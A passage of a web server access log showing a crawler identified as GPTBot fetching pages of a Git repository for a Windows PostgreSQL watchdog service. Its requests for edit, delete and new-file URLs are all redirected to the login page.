"/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 1087] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 9958] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 92] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13584] [Gzip 7.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10535] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 9959] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 1077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 3572] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 1077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 26188] [Gzip 15.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 3170] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:29:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:29:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:29:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 